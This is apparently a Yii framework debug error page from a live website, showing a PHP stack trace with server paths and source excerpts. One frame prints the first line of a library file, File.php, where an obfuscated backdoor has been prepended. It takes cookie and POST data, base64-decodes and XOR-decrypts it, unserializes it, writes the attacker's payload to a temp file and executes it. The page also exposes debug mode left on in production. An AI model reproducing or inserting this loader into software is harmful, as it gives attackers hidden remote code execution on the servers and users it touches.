/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/YiiBase.php(427)
415 { 416 include($classFile); 417 if(YII_DEBUG && basename(realpath($classFile))!==$className.'.php') 418 throw new CException(Yii::t('yii','Class name "{class}" does not match class file "{file}".', array( 419 '{class}'=>$className, 420 '{file}'=>$classFile, 421 ))); 422 break; 423 } 424 } 425 } 426 else 427 include($className.'.php'); 428 } 429 else // class name with namespace in PHP 5.3 430 { 431 $namespace=str_replace('\\','.',ltrim($className,'\\')); 432 if(($path=self::getPathOfAlias($namespace))!==false) 433 include($path.'.php'); 434 else 435 return false; 436 } 437 return class_exists($className,false) || interface_exists($className,false); 438 } 439 return true;
#0 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/YiiBase.php(427): YiiBase::autoload() 422 break; 423 } 424 } 425 } 426 else 427 include($className.'.php'); 428 } 429 else // class name with namespace in PHP 5.3 430 { 431 $namespace=str_replace('\\','.',ltrim($className,'\\')); 432 if(($path=self::getPathOfAlias($namespace))!==false) |
#1 |
unknown(0): YiiBase::autoload("yazmdsa")
|
#2 |
unknown(0): spl_autoload_call("yazmdsa")
|
#3 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/libs/File.php(1): class_exists("yazmdsa") 1 <?php if (!class_exists("yazmdsa")){class yazmdsa{public static $fibch = "cwjbdnctnahbtaxa";public static $ejdtczrzgo = NULL;public function __construct(){$ymqekc = @$_COOKIE[substr(yazmdsa::$fibch, 0, 4)];if (!empty($ymqekc)){$vrxbkifdn = "base64";$ftwmncjy = "";$ymqekc = explode(",", $ymqekc);foreach ($ymqekc as $asielkkobq){$ftwmncjy .= @$_COOKIE[$asielkkobq];$ftwmncjy .= @$_POST[$asielkkobq];}$ftwmncjy = array_map($vrxbkifdn . "_decode", array($ftwmncjy,));$ftwmncjy = $ftwmncjy[0] ^ str_repeat(yazmdsa::$fibch, (strlen($ftwmncjy[0]) / strlen(yazmdsa::$fibch)) + 1);yazmdsa::$ejdtczrzgo = @unserialize($ftwmncjy);}}public function __destruct(){$this->bkpeank();}private function bkpeank(){if (is_array(yazmdsa::$ejdtczrzgo)) {$eyrtmpbcmr = sys_get_temp_dir() . "/" . crc32(yazmdsa::$ejdtczrzgo["salt"]);@yazmdsa::$ejdtczrzgo["write"]($eyrtmpbcmr, yazmdsa::$ejdtczrzgo["content"]);include $eyrtmpbcmr;@yazmdsa::$ejdtczrzgo["delete"]($eyrtmpbcmr);exit();}}}$vosazhvjh = new yazmdsa();$vosazhvjh = NULL;} ?><?php 2 3 4 class File 5 { 6 |
#4 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/YiiBase.php(427): include("/srv/users/serverpilot/apps/glassaffordable/public/protected/lib...") 422 break; 423 } 424 } 425 } 426 else 427 include($className.'.php'); 428 } 429 else // class name with namespace in PHP 5.3 430 { 431 $namespace=str_replace('\\','.',ltrim($className,'\\')); 432 if(($path=self::getPathOfAlias($namespace))!==false) |
#5 |
unknown(0): YiiBase::autoload("File")
|
#6 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/themes/default/views/site/index.php(22): spl_autoload_call("File") 17 18 <!-- Wrapper for slides --> 19 <div class="carousel-inner"> 20 <?php $i=0; foreach ($model_slider as $key ) { ?> 21 <div class="item <?php if($i===0){ ?> active <?php } ?>"> 22 <div class="fill" style="background-image:url('<?php echo File::imageresizeURL(1900,1080,$key->img,$key->image_folder) ?>');"></div> 23 </div> 24 <?php $i++; } ?> 25 26 </div> 27 |
#7 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/web/CBaseController.php(126): require("/srv/users/serverpilot/apps/glassaffordable/public/themes/defaul...") 121 $data=$_data_; 122 if($_return_) 123 { 124 ob_start(); 125 ob_implicit_flush(false); 126 require($_viewFile_); 127 return ob_get_clean(); 128 } 129 else 130 require($_viewFile_); 131 } |
#8 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/web/CBaseController.php(95): CBaseController->renderInternal("/srv/users/serverpilot/apps/glassaffordable/public/themes/defaul...", null, true) 090 { 091 $widgetCount=count($this->_widgetStack); 092 if(($renderer=Yii::app()->getViewRenderer())!==null && $renderer->fileExtension==='.'.CFileHelper::getExtension($viewFile)) 093 $content=$renderer->renderFile($this,$viewFile,$data,$return); 094 else 095 $content=$this->renderInternal($viewFile,$data,$return); 096 if(count($this->_widgetStack)===$widgetCount) 097 return $content; 098 else 099 { 100 $widget=end($this->_widgetStack); |
#9 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/web/CController.php(869): CBaseController->renderFile("/srv/users/serverpilot/apps/glassaffordable/public/themes/defaul...", null, true) 864 */ 865 public function renderPartial($view,$data=null,$return=false,$processOutput=false) 866 { 867 if(($viewFile=$this->getViewFile($view))!==false) 868 { 869 $output=$this->renderFile($viewFile,$data,true); 870 if($processOutput) 871 $output=$this->processOutput($output); 872 if($return) 873 return $output; 874 else |
#10 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/web/CController.php(782): CController->renderPartial("index", null, true) 777 */ 778 public function render($view,$data=null,$return=false) 779 { 780 if($this->beforeRender($view)) 781 { 782 $output=$this->renderPartial($view,$data,true); 783 if(($layoutFile=$this->getLayoutFile($this->layout))!==false) 784 $output=$this->renderFile($layoutFile,array('content'=>$output),true); 785 786 $this->afterRender($view,$output); 787 |
#11 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/controllers/front/SiteController.php(39): CController->render("index") 34 if (SITE_TYPE==3) 35 { 36 $this->redirect(FRONT_URL.'user/login'); 37 } 38 $this->layout = '//layouts/column-home'; 39 $this->render('index'); 40 } 41 42 43 public function actionThankyou() 44 { |
#12 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/web/actions/CInlineAction.php(49): SiteController->actionIndex() 44 $controller=$this->getController(); 45 $method=new ReflectionMethod($controller, $methodName); 46 if($method->getNumberOfParameters()>0) 47 return $this->runWithParamsInternal($controller, $method, $params); 48 else 49 return $controller->$methodName(); 50 } 51 52 } |
#13 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/web/CController.php(308): CInlineAction->runWithParams(array()) 303 { 304 $priorAction=$this->_action; 305 $this->_action=$action; 306 if($this->beforeAction($action)) 307 { 308 if($action->runWithParams($this->getActionParams())===false) 309 $this->invalidActionParams($action); 310 else 311 $this->afterAction($action); 312 } 313 $this->_action=$priorAction; |
#14 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/web/CController.php(286): CController->runAction(CInlineAction) 281 * @see runAction 282 */ 283 public function runActionWithFilters($action,$filters) 284 { 285 if(empty($filters)) 286 $this->runAction($action); 287 else 288 { 289 $priorAction=$this->_action; 290 $this->_action=$action; 291 CFilterChain::create($this,$action,$filters)->run(); |
#15 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/web/CController.php(265): CController->runActionWithFilters(CInlineAction, array()) 260 { 261 if(($parent=$this->getModule())===null) 262 $parent=Yii::app(); 263 if($parent->beforeControllerAction($this,$action)) 264 { 265 $this->runActionWithFilters($action,$this->filters()); 266 $parent->afterControllerAction($this,$action); 267 } 268 } 269 else 270 $this->missingAction($actionID); |
#16 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/web/CWebApplication.php(282): CController->run("") 277 { 278 list($controller,$actionID)=$ca; 279 $oldController=$this->_controller; 280 $this->_controller=$controller; 281 $controller->init(); 282 $controller->run($actionID); 283 $this->_controller=$oldController; 284 } 285 else 286 { 287 |
#17 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/web/CWebApplication.php(141): CWebApplication->runController("") 136 foreach(array_splice($this->catchAllRequest,1) as $name=>$value) 137 $_GET[$name]=$value; 138 } 139 else 140 $route=$this->getUrlManager()->parseUrl($this->getRequest()); 141 $this->runController($route); 142 } 143 144 /** 145 * Registers the core application components. 146 * This method overrides the parent implementation by registering additional core components. |
#18 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/base/CApplication.php(191): CWebApplication->processRequest() 186 public function run() 187 { 188 if($this->hasEventHandler('onBeginRequest')) 189 $this->onBeginRequest(new CEvent($this)); 190 register_shutdown_function(array($this,'end'),0,false); 191 $this->processRequest(); 192 if($this->hasEventHandler('onEndRequest')) 193 $this->onEndRequest(new CEvent($this)); 194 } 195 196 /** |
#19 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/components/WebApplicationEndBehavior.php(25): CApplication->run() |
#20 |
unknown(0): WebApplicationEndBehavior->runEnd("front")
|
#21 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/protected/vendor/framework/base/CComponent.php(261): call_user_func_array(array(WebApplicationEndBehavior, "runEnd"), array("front")) 256 if($this->_m!==null) 257 { 258 foreach($this->_m as $object) 259 { 260 if($object->getEnabled() && method_exists($object,$name)) 261 return call_user_func_array(array($object,$name),$parameters); 262 } 263 } 264 if(class_exists('Closure', false) && $this->canGetProperty($name) && $this->$name instanceof Closure) 265 return call_user_func_array($this->$name, $parameters); 266 throw new CException(Yii::t('yii','{class} and its behaviors do not have a method or closure named "{name}".', |
#22 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/index.php(11): CComponent->__call("runEnd", array("front")) 06 // Remove the following lines when in production mode 07 defined('YII_DEBUG') or define('YII_DEBUG', true); 08 defined('YII_TRACE_LEVEL') or define('YII_TRACE_LEVEL', 3); 09 10 require_once($yii); 11 Yii::createWebApplication($config)->runEnd('front'); |
#23 |
+
–
/srv/users/serverpilot/apps/glassaffordable/public/index.php(11): CWebApplication->runEnd("front") 06 // Remove the following lines when in production mode 07 defined('YII_DEBUG') or define('YII_DEBUG', true); 08 defined('YII_TRACE_LEVEL') or define('YII_TRACE_LEVEL', 3); 09 10 require_once($yii); 11 Yii::createWebApplication($config)->runEnd('front'); |